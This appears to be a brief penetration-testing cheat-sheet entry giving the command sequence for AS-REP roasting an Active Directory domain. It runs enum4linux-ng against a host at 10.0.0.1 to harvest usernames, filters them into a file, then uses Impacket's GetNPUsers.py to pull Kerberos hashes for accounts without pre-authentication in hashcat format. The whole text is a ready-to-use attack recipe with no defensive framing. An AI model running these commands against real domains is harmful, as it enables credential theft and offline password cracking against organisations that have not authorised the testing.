enum4linux-ng
enum4linux-ng.py 10.0.0.1 -oY enum4-fqdn
cat enum4-fqdn.yaml | grep users > users.txt
cd impacket\examples to check if pre-auth is enabled
GetNPUsers.py -dc-ip 10.0.0.1 fqdn.loc/ -usersfile users.txt -format hashcat -outfile hash.txt
Last updated